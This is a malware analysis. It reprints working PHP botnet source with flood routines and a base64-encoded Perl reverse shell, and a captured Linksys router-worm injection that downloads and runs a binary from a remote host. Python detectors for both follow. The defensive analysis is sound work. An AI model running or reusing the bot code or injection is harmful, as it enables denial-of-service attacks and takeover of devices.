fwrite( $fp , $packet );
fclose( $fp );
$packets++;
}
else
{
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
}
}
if ( $packets == 0 )
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],'<br /><b>An error occurred! Could not send packets.</b><br />' . "\n");
}
else
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],$host) ;
$this->privmsg($this->config['chan'],$length) ;
$this->privmsg($this->config['chan'],'<b>Packets:</b> ' . round($packets) . ' ( ' . round($packets/$length) . ' packets/s ) <br />' . "\n");
}
return 0;
}
////////////
function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
////////////
function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Killing $host:$port for $time - Disconnected...]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Finished ! - Connected...]\2");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing TCP Connection $host:$port - Disconnected...]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
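The flood routines in the bot above build their HTTP requests by hand, and each builder leaves a fingerprint a web server or reverse proxy can match on: attack_http and attack_post never send the empty line that closes the header block and advertise "Accept: *.*" where a browser sends "*/*"; attack_post declares "Content-Length: 1000000000" against a random 32-hex path and sends no body; doSlow appends a random "X-a:" header to every write; httpflood puts a form Content-Type on a GET and a fixed "Keep-Alive: 900". (A separate caveat for anyone analysing the sample: cloudflareflood() runs the challenge expression scraped from the target's response through PHP eval(), so the bot executes whatever the target returns between "a.value = " and ";".) The following is an added example, not code from the captured sample: a Python classifier that parses a raw request the way the server sees it and lists which of those quirks it carries. The sample requests are constructed from the bot's own packet builders with the hostname target.example; none of them is captured traffic.

```python
"""Fingerprint HTTP requests emitted by the pBot flood routines.

Added example, not part of the captured sample. The sample requests are
constructed from the bot's packet builders (attack_post, doSlow, httpflood)
plus one ordinary browser request as a control; target.example is an
assumed hostname.
"""
import re
from typing import Dict, List, Tuple

HEX32_PATH = re.compile(r"^/[0-9a-f]{32}$")   # attack_post: "/" . md5(rand())


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bool]:
    """Split a raw request into (method, path, headers, complete).

    complete is False when no empty line terminates the header block, which
    is how attack_http, attack_post and doSlow leave every socket: the server
    keeps waiting for the rest of the headers. Header names are lower-cased;
    a repeated name keeps its last value.
    """
    text = raw.decode("latin-1")
    complete = "\r\n\r\n" in text
    head = text.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method = parts[0]
    path = parts[1] if len(parts) > 1 else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, complete


def flood_indicators(raw: bytes) -> List[str]:
    """Return the names of the bot quirks present in one request."""
    method, path, h, complete = parse_request(raw)
    hits: List[str] = []
    if not complete:
        hits.append("unterminated_headers")       # header block never closed
    if h.get("accept") == "*.*":
        hits.append("accept_star_dot_star")       # browsers send */*, the bot sends *.*
    try:
        if int(h.get("content-length", "0")) >= 10_000_000:
            hits.append("absurd_content_length")  # attack_post: 1000000000 and no body
    except ValueError:
        hits.append("bad_content_length")
    if "x-a" in h:
        hits.append("rudy_junk_header")           # doSlow: "X-a: <random>" on every write
    if method in ("GET", "HEAD") and "content-type" in h:
        hits.append("content_type_on_get")        # httpflood: form Content-Type on a GET
    if HEX32_PATH.match(path):
        hits.append("md5_random_path")            # attack_post: random 32-hex path
    if h.get("keep-alive") == "900":
        hits.append("keepalive_900")              # fixed value in attack_http/attack_post/httpflood
    return hits


# Constructed from attack_post(): 1 GB declared, no body, no closing empty line.
SAMPLE_ATTACK_POST = (
    b"POST /9e107d9d372bb6826bd81d3542a419d6 HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"
    b"Keep-Alive: 900\r\n"
    b"Content-Length: 1000000000\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Accept: *.*\r\n"
)
# Constructed from doSlow(): RUDY header fragment, never terminated.
SAMPLE_RUDY = (
    b"POST / HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n"
    b"Content-Length: 512\r\n"
    b"X-a: 4242\r\n"
)
# Constructed from httpflood(): complete GET with a form Content-Type.
SAMPLE_HTTPFLOOD = (
    b"GET / HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"Keep-Alive: 900\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    b"Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n"
    b"Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
    b"Connection: keep-alive\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n\r\n"
)
# Constructed control: an ordinary browser request.
SAMPLE_BROWSER = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: target.example\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
    b"Accept: text/html,*/*;q=0.8\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
SAMPLES = {
    "attack_post": SAMPLE_ATTACK_POST,
    "rudy": SAMPLE_RUDY,
    "httpflood": SAMPLE_HTTPFLOOD,
    "browser": SAMPLE_BROWSER,
}


def classify(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run flood_indicators over a batch of raw requests."""
    return {name: flood_indicators(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in classify(SAMPLES).items():
        print(f"{name:12s} {hits or 'clean'}")
```

The unterminated-header signal is the one that matters operationally: the three slow routines hold 100 sockets each and keep writing header lines, so a server-side header timeout (and a cap on total header bytes per connection) ends them, whereas the header typos are only useful for attribution once the flood is already being dropped.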
Linksys "The Moon" Worm
[Attack info]
Attacker:
221.213.121.104
Dest. port: 8080
Time: 05/10/2019 15:51:03
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Yunnan, Kunming
Description
The worm appears to extract the router hardware version and the firmware revision. The request captured here is the exploitation step rather than that fingerprinting: the ttcp_ip parameter of tmUnblock.cgi carries a backtick-quoted shell command that changes to /tmp, removes any old copy of wolf.mpsl, fetches http://104.244.78.187/bins/wolf.mpsl, marks it executable and runs it with the argument "linksys" (see the request body and the resource details below). The relevant lines are:
CVE
CVE-2002-2159, CVE-2008-1247, CVE-2008-1268, CVE-2008-4594, CVE-2009-3341, CVE-2010-1573, CVE-2010-2261, CVE-2008-0228
Author
Unknown
POST /tmUnblock.cgi HTTP/1.1
Content-Length: 227
accept-encoding: gzip, deflate
connection: keep-alive
Accept: */*
User-Agent: python-requests/2.20.0
Host: 192.168.0.14:80
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP
Resource ( 1 / 2 )
MD5: a3e8823f36ad8356086415bb766035cb
Type: application/x-executable
Size: 71996
URL: http://104.244.78.187/bins/wolf.mpsl
[ELF binary content omitted: a 71996-byte ELF executable, MD5 and URL as listed above; the .mpsl suffix conventionally denotes a MIPS little-endian build]
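The request body above is the interesting part of this capture: on affected Linksys firmware the ttcp_ip parameter of tmUnblock.cgi reaches a shell unsanitised, which is what the backtick-quoted command relies on. Below is an added example, not code from the honeypot page or from the worm: a Python helper that decodes such a form body, checks whether ttcp_ip is still the dotted-quad address the CGI expects, and otherwise pulls out the command list, the download URLs and the binaries it launches. The first sample body is the one captured above, copied verbatim (including the truncated trailing StartEP field); the second is a constructed benign control.

```python
"""Pull the injected shell command out of a tmUnblock.cgi POST body.

Added example, not part of the honeypot page or the worm. CAPTURED_BODY is
the request body shown on the page; BENIGN_BODY is a constructed control.
"""
import re
from typing import Dict, List
from urllib.parse import parse_qs

DOTTED_QUAD = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SUBSHELL = re.compile(r"`([^`]*)`|\$\(([^)]*)\)")          # `...` or $(...)
URL = re.compile(r"(?:https?|ftp|tftp)://[^\s;`'\"|&]+")
SEPARATOR = re.compile(r"\s*(?:\|\||&&|[;|&])\s*")        # command separators

CAPTURED_BODY = (
    "ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+wolf.mpsl%3B+wget+http%3A%2F%2F104.244.78.187"
    "%2Fbins%2Fwolf.mpsl%3B+chmod+777+wolf.mpsl%3B+.%2Fwolf.mpsl+linksys%60"
    "&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEP"
)
# Constructed: what a legitimate ttcp diagnostic submission would look like.
BENIGN_BODY = "ttcp_ip=192.168.1.100&ttcp_num=2&ttcp_size=2&action=&submit_button=&commit=0"


def extract_injection(body: str) -> Dict[str, object]:
    """Decode the form body and describe any shell injection in ttcp_ip.

    Returns a dict with the raw ttcp_ip value, whether it deviates from a
    dotted quad, the individual shell commands, every URL they fetch and the
    names of binaries started with "./".
    """
    params = parse_qs(body, keep_blank_values=True)
    value = params.get("ttcp_ip", [""])[0]
    result: Dict[str, object] = {
        "ttcp_ip": value,
        "injected": False,
        "commands": [],
        "urls": [],
        "executed": [],
    }
    if not value or DOTTED_QUAD.match(value):
        return result
    result["injected"] = True
    m = SUBSHELL.search(value)
    if m:
        shell = m.group(1) if m.group(1) is not None else m.group(2)
    else:
        shell = value                      # metacharacters without a subshell wrapper
    commands: List[str] = [c for c in SEPARATOR.split(shell) if c]
    executed: List[str] = []
    for cmd in commands:
        first = cmd.split()[0]
        if first.startswith("./"):
            executed.append(first[2:])
    result["commands"] = commands
    result["urls"] = URL.findall(shell)
    result["executed"] = executed
    return result


if __name__ == "__main__":
    for label, body in (("captured", CAPTURED_BODY), ("benign", BENIGN_BODY)):
        print(label, extract_injection(body))
```

For the captured body the helper reports five commands, one download URL (the 104.244.78.187 host is the indicator worth blocking or hunting for in egress logs) and wolf.mpsl as the executed binary; for the control it returns injected=False. The dotted-quad test on its own is also the correct server-side fix for this parameter: an allow-list on the address format, rather than any attempt to strip shell metacharacters.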